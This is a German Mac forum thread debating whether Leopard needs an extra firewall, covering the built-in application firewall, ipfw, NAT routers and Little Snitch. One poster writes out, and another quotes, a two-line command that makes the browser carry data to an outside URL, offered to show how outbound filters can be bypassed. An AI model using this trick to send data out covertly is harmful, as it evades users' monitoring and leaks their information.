Zusätzliche Firewall nötig?

[Demnächst_Macer]

Hallo, ist eine zusätzliche Firewall unter Leopard nötig?

Wie sollte ich die interne Firewall einstellen?
Bei der 3. Option kann man - wenn ich das richtig verstanden habe - eine Liste erstellen, für die Programme, die Daten aus dem Internet empfangen dürfen. Ich habe also zum Probieren Safari nicht in die Liste getan, trotzdem kann ich damit im Internet surfen. Habe ich was falsch gemacht?

Ist die 2. Option zu bevorzugen?

Kann man damit auch den Datenausgang überwachen? Bisher sah ich nur, dass man den Dateneingang regeln kann.

Was macht ihr, verwendet ihr eine zusätliche Firewall?

Danke

 

[Snoopy181]

Ein zusätzliches Schutzprogramm richtet mehr Schaden an als es nutzt. Deswegen würde ich mir kein zusätzliches Firewall-/Virenschutz-Programm installieren.

 

[dewey]

ich würde noch little snitch nehmen. das überwacht die verbindungen von innen nach aussen

 

[awk]

Apple setzt auf ipfw. Die grafische Oberfläche ist meines Erachtens ein wenig zu sehr vereinfacht.

Das hier habe ich mir nicht ganz durchgelesen, sieht auf den ersten Blick ganz gut aus. Vorallem die allgemeinen Gedanken dazu (Seite 2) sind für den Einstieg vermutlich hilfreich. (bezieht sich auf 10.4, ich weiss nicht, ob es Änderungen zu 10.5 gibt, aber der allg. Teil behält seine Gültigkeit)

Ausserdem interessant: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/firewalls.html

Sollte weiter Interesse bestehen, dann findet man mit "mac os x ipfw" bei google einiges.

Und noch ein Link zu Firewalls. Meine Einstellung spiegelt sich in dem Punkt wieder.

 

[floorjiann]

Oder wenn man eine GUI zu ipfw haben will...

 

[awk]

Danke für den Link, wenn man sich allerdings mit Firewalls nicht auskennt, dann macht das Programm auch keinen Sinn.

 

[QuickMik]

ich würde sagen......wenn man seinen NAT router nicht zerkonfiguriert, braucht es überhaupt keine FW.
ich hab sie seit 1998 auf 100ten kisten nicht aktiv.
nur so zum nachdenken.....

 

[MacMark]

Apple setzt auf ipfw. Die grafische Oberfläche ist meines Erachtens ein wenig zu sehr vereinfacht....

Die Firewall-GUI in OS X 10.4 und früher konfiguriert (allerdings nur eingeschränkt) die ipfw.

Die Firewall-GUI in OS X 10.5 konfiguriert die mit 10.5 neu hinzugekommene "Application Level Firewall". Die programmabhängige Einstellung ist für den Benutzer leichter nachzuvollziehen als abstrakte Portnummern.
Die ipfw ist nur noch per CLI einstellbar in 10.5, da sie ohnehin nur von Profis verstanden wird.(Ausnahme: Der "Tarnmodus" gehört zur ipfw und wird per GUI eingestellt.)

10.5 betreibt beide Firewalls parallel, jede auf ihrer Protokollebene.

Mehr dazu:
http://www.macmark.de/osx_security.php#firewall

 

[iStefan]

Appel selber beschreibt die Wirkungsweise der Application Firewall hier:
http://support.apple.com/kb/HT1810?viewlocale=de_DE
Zusätzlich wird auch bei 10.5 ipfw gestartet und läuft permanent.
Es sind aber keine Regeln definiert, wie sudo ipfw list zeigt
(Ergebnis: 65535 allow ip from any to any).
D.h. theoretisch reicht es aus ipfw Regeln beizubringen und diese bei Systemstart zu aktivieren.
Das Hauptproblem dabei ist die Auswahl der richtigen Regeln für die entsprechenden Ports.
Eine Liste dieser TCP- und UDP-Ports gibt es auch bei Apple:
http://support.apple.com/kb/TS1629?viewlocale=de_DE
Die Konfiguration von ipfw erfordert also eingehende Kenntnisse über die Kommunikationsanforderungen des eigenen Systems. Einfach ein paar Regeln erstellen ist schlussendlich nur eine Scheinsicherheit.
Auch von Tools wie LittleSnitch rate ich ab.
Zunächst einmal sollte man verstehen, welche Verbindungen der Rechner im Netzwerk hat. Dazu nimmt man am einfachsten sudo netstat -p udp bzw. sudo netstat -p tcp.
Möchte man wissen, welche Programme eine Verbindung ins Netzwerk herstellen nimmt man
sudo lsof -i.
Den Netzverkehr live verfolgen kann man dann mit sudo tcpdump.
Anschließend herrscht bereits mehr Klarheit. Hat man nichts außergewöhnliches installiert offenbart sich sehr schnell die Obsoleszenz von Tools wie LittleSnitch.

 

[MacMark]

Little Snitch wird gern als "Security"-Programm eingeordnet. Ich halte das für einfältig, denn betrachte mal folgendes Szenario:
Little Snitch benutzt Regeln, die festlegen, welches Programm auf welchem Port Daten rausschicken darf, meinetwegen auch noch, an wen es die schicken darf. Klingt gut, gelle?
So: Deinem Browser wirst Du jede ausgehende Kommunikation auf Port 80 erlauben müssen, egal wohin. Wenn nicht, ist Dein Browser praktisch nutzlos.
Es ist nun aber denkbar, daß ein "unartiges" Programm die Daten gar nicht selbst rausschickt, sondern dem Browser mitteilt, er möge eine bestimmte URL ansurfen und in der URL übergibt man dann ganz viele Daten. Das ist für den Browser technisch so, als wenn Du hier einen Kommentar postest. Die eigentliche Verbindung macht dann der Browser auf und die Daten schickt auch der Browser raus.

Beispiel: Im Terminal diesen Befehl, den jedes Programm absetzen könnte:

echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_to _us" > badboy.url

Und dann diesen:

open badboy.url

Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch. Mit Zeilenumbruch am Ende sollte es nicht nur auf OS X so klappen.

Man kann also leicht Little Snitch ausweichen. Ich habe das nicht selbst ausprobiert, aber vielleicht testet das mal jemand, der Little Snitch benutzt

Little Snitch installiert meines Wissens eine Kernel-Extension. Prozesse unter root sind immer beliebtes Angriffsziel. Fällt der Prozeß, ist das System meistens Toast (falls nicht sandboxed, siehe meine Seite). Hat Little Snitch einen Bug, hat man ein Problem, denn Little Snitch liest ja jeden ausgehenden Verkehr und ist damit leicht zu erreichen.

Fragen: Blockt Little Snitch eigenen Nach-Hause-Verkehr? Vertraut man dem Entwickler des Programmes? Kann man in den Quellcode schauen?

Es gibt auch andere Wege, den Netzverkehr von Programmen zu überwachen, ohne Little Snitch: netstat, tcpdump etc. Alles Bordmittel.

Ich bin sehr vorsichtig damit, was ich als root laufen lasse. Little Snitch läuft bei mir jedenfalls nicht.

 

[QuickMik]

Little Snitch wird gern als "Security"-Programm eingeordnet.

naja....eine firewall ist LS sicher nicht.
leider wird sie oft als solche bezeichnet.
paket filter würde es eher treffen.

die ipfw ist mächtig aber von apple schon fast sträflich vernachläßigt.

ausserdem würde ich sagen, das man schon die kirche im dorf lassen sollte.
man kann mit recht einfachen dingen....relativ hohe sicherheit erreichen.
die letzten 10 % sind immer ein enormer aufwand und ohne knowhow nicht zu verkleinern.

wir haben schon öfter hier auf AT über sicherheit, sicherheit von os x, firewall u.ä. disskutiert.

wie schon öfter erwähnt, verwenden die meisten einen router und sind somit über NAT schon mal relativ sicher. wenn man dann noch UnPn NICHT aufdreht, ist es noch besser.

wenn man natürlich limewire, bittorrent usw. am rödeln hat, braucht man sich nicht wundern, wenn man sich was einfängt.
diese "gnome" (als überbegriff für virus,würmer, trojaner) mal auf der platte, wird es natürlich recht schwierig sie von ihrer eigentlichen bestimmung abzuhalten.

also so wie ich das sehe, sind os x rechner auch ohne aktive firewall (und LS) hinter einem normalen NAT router recht sicher, wenn sie keine oben beschriebene software verwenden.

da braucht man sich (weder in vergangenheit noch in naher zukunft) wegen gnomen einen kopf machen.

und bevor wieder zeter und mordio geschrien wird....

ich betreue 100te rechner im unternehmens oder privaten bereich.
seit schon fast jahrzenten.
habe bis jetzt noch niemanden über "gnome" klagen gehört.
oder geschweige denn, einen gefunden.

also...lassen wir doch die kirche im dorf.

ciao
mike

 

[MacMark]

Ein Paket-Filter ist eine ganz klassische Firewall. Beispielsweise die ipfw in aber nicht nur in OS X. Sie filtert auf Netzwerkebene ohne die agierenden Programme zu kennen. Es kann beliebig ein- und ausgehender Verkehr gefiltert werden.

Little Snitch ist wie die zusätzlich neu in 10.5 hinzugekommene Firewall in OS X eine Application-Level-Firewall, da die Regeln auch die betroffenen Programme berücksichtigen. Die OS X-interne AL-Firewall konzentriert sich auf eingehenden Verkehr, Little Snitch kümmert sich hingegen um ausgegehenden Verkehr auf Programmebene.

Mit IPv6 ist NAT endlich obsolet. Dann kann wieder jeder Teilnehmer direkt adressiert werden. NAT ist nur eine Krücke, weil IPv4 zu wenige Adressen ermöglicht.

 

[Rastafari]

echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_to _us" > badboy.url

Und dann diesen:

open badboy.url

Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch.

Das glaube ich eher nicht.

 

[MacMark]

Im Normalfall verbietet jedoch niemand seinem Webbrowser, irgendwelche Seiten zu besuchen.

 

[Rastafari]

Im Normalfall verbietet jedoch niemand seinem Webbrowser, irgendwelche Seiten zu besuchen.

Es geht ja auch nur um das blocken *heimlicher* Verbindungsversuche. So wie das zB eine Spyware-Applikation mit integrierter Backdoor machen würde. Per Webbrowser einen Rechner effektiv auszuspionieren oder gar fernzusteuern gestaltet sich dagegen doch etwas ... trocken.

PS
Safari den Zugriff auf diverse Banner- und Adware-Server zu sperren hältst du nicht für sinnvoll? Andere machen das mit AdBlock...

 

[MacMark]

Die meisten User werden Safari Webverbindungen pauschal in Little Snitch erlauben. Und wenn die Spyware, wie dargestellt, den Browser zu einem Request veranlaßt, und dieser die Daten an einen nicht als AD-Server bekannte URL schickt, dann hat die Spyware den Little Snitch mit ihrem Spiel "über Bande" geleimt.

Worauf ich hinaus will ist, daß der eigentliche Vorteil, den sich die Leute von Little Snitch erhoffen, einfach umgangen werden kann.

 

[QuickMik]

Es geht ja auch nur um das blocken *heimlicher* Verbindungsversuche. So wie das zB eine Spyware-Applikation mit integrierter Backdoor machen würde. Per Webbrowser einen Rechner effektiv auszuspionieren oder gar fernzusteuern gestaltet sich dagegen doch etwas ... trocken.

ACK

was will mir einer mit einer url auf einem mac schon unterjubeln.
safari fragt sowieso, wenn eine applikation runtergeladen wird.
und wenn man dann 7x auf ok drückt.....naja, derartigen leuten ist wohl schwer zu helfen.

also wie gesagt, ich finde, das man keine unnötige panik verbreiten sollte.

bin nach wie vor der meinung, das ene FW "nur" für eingehenden verkehr sowieso sinnlos ist.
nochmal...da reicht ein NAT router.
von innen nach aussen, sollte man sich wirklich überlegen was und ob man etwas braucht.

ich persönlich richte z.b. die host datei ganz gerne gegen die von den hersteller erzwungenen update geschichten ein.

bin der meinung, das es adobe nicht angeht, wann ich mein PS öffne und schließe.
mag sein, das sowas paranoid ist. aber mir geht diese bevormundung auf den geist.

aber auch dazu brauche ich keine FW. weil ich weiß, was ich tue.

denke, das hier sowieso der punkt ist.
wenn man weiß, was man tut.....braucht es keine FW o.ä.

wenn ich meine kiste als DMZ bei den supertollen FW routern um 50€ einrichte und dann auch noch das FTP,SMP,AFP als gast offen habe.

naja, dann glaube ich aber, das ich auch zu blöd für ein FW wäre.

 

[MacMark]

… was will mir einer mit einer url auf einem mac schon unterjubeln.
safari fragt sowieso, wenn eine applikation runtergeladen wird. …

Du stehst am völlig falschen Bahnhof. Du hast mich nicht verstanden! Versuche ich es mal so:

Nimm an, Du hast Photoshop installiert und willst nicht, daß es etwas an Adobe schickt. Also blockst Du jeden ausgehenden Versuch mit Little Snitch. Photoshop kann aber trotzdem alles an Adobe schicken, indem es eine passende URL indirekt mit dem Browser öffnen läßt. Dann schickt Safari einen von vielen Requests raus und Du bist angeschmiert. Du wirst sicher nicht Adobes Website blocken für Safari, weil Du da ja auch selbst mal bei Adobe rumschauen willst.

 

[QuickMik]

ACK
wenn aber adobe sowas machen würde, wäre das ja schon ein IMHO arglistig verschwiegener weg....
da würden schon einige verbraucherschützer u.ä. auf die barrikaden steigen.
schließlich nutzen sie ja ihre internet aktivierung und brauchen auf deratige trojanische methoden nicht zurück greifen.

kann mich noch erinnern, als apple wissen wollte, welche musik man mit itunes hört.
obwohl, mit ihrer genius geschichte und mit dem cover laden, werden sie das auch rausbekommen.

ich muß sagen, das ich von M$ sehr überrascht war, das die derartige dinge nicht mehr machen.
velleicht haben sie ja aus der vergangenheit gelernt......ob nur am mac....entzieht sich meiner kenntnis.

aber bitte mich nicht falsch verstehen...
wollte wirklich nur, das man die kirche im dorf läßt.
firewall und security threads werden sehr schnell zu paranoia threads. wie wir hier immer wieder erleben können.
und das ist wirklich nicht notwendig.

und das meine ich genau so.
man kann heute einen frisch installierten mac an eine echte offizielle IP hängen und muß nicht befürchten....
das er in den nächsten wochen gehackt wird.

anders bei windows, wie zahlreiche versuche ergeben haben.
nach 3 min. war die kiste schon gekidnappt.

wenn ich mir den titel dieses threads ansehe.......
klare antwort von mir ....nein...es ist gar keine FW nötig.
begründungen hab ich ja schon geliefert.

 

[rc4370]

habe eine firewall im router. seit jahren keine probleme.